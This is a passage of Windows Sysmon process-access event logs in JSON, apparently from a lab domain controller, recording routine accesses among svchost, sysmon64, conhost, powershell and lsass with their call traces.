{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5520,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5521,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5522,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5523,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5524,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5525,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5526,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5527,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5528,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.041\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 